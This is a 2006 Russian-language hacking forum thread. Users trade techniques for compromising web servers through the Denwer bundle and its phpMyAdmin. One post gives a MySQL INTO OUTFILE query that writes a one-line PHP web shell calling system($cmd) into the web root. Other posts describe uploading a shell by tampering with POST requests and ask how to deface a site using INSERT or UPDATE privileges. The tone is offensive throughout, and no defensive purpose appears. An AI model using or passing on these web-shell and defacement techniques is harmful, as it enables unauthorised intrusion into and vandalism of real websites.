помогите продолжить =))

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

26.08.2006 23:51:41

Цитата
олег степанов пишет: с денвером же поставляется phpmyadmin

И правда: что-то совсем забыл про это

Цитата
олег степанов пишет: Пошаманил с запросами к бд,в результате организовался файл с необходимым содержимым(system($cmd)

Чесно говоря, слышал про такие манипуляции с MSSQL-ом, а вот про мускула - нет...

Можешь дать линк где почитать про подобные запросы с созданием файла?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

олег степанов

Guest

#22

Это нравится:0 Да/0 Нет

27.08.2006 00:04:38

Цитата
Можешь дать линк где почитать про подобные запросы с созданием файла?

Документация по mysql (select), линк дать не могу, потому как не знаю у меня книга по mysql там все и прочитал

skvoznoy Андрей К.

эксперт

Сообщений: 895 Баллов: 909 Регистрация: 25.08.2006

#23

Это нравится:0 Да/0 Нет

27.08.2006 01:00:24

взлом через денвер.
конкретно в двух словах - изменение HTTP POST запросов, через скрипты денвера выполняешь неавторизированныф код и заливаешь шелл. Подробнее читай в статье, которая скоро будет "Взлом через DENVER"

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#24

Это нравится:0 Да/0 Нет

27.08.2006 01:14:19

Цитата
олег степанов пишет: Пошаманил с запросами к бд,в результате организовался файл с необходимым содержимым(system($cmd))

Что-то вроде:

Цитата
INSERT '<? system($cmd) ?>' INTO OUTFILE /www/shell.php

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#25

Это нравится:0 Да/0 Нет

27.08.2006 01:16:58

Цитата
skvoznoy Андрей К. пишет: Подробнее читай в статье, которая скоро будет "Взлом через DENVER"

Где будет?

Цитата
skvoznoy Андрей К. пишет: изменение HTTP POST запросов

А это-то тут при чём?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

grisha Guest	#26 Это нравится:0 Да/0 Нет 28.08.2006 09:18:40 Вопрос по defac'у сайта есть имя таблцы, есть 6 имен полей (всего 8) не на всех знаю тип поля. и возможно есть права на INSERT, UPDATE. можно ли вставить или обновить поля при такой "раскладке"? Еще нет прав н запись т.е. select from table1 into outfile 'php.php' Access denied.

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?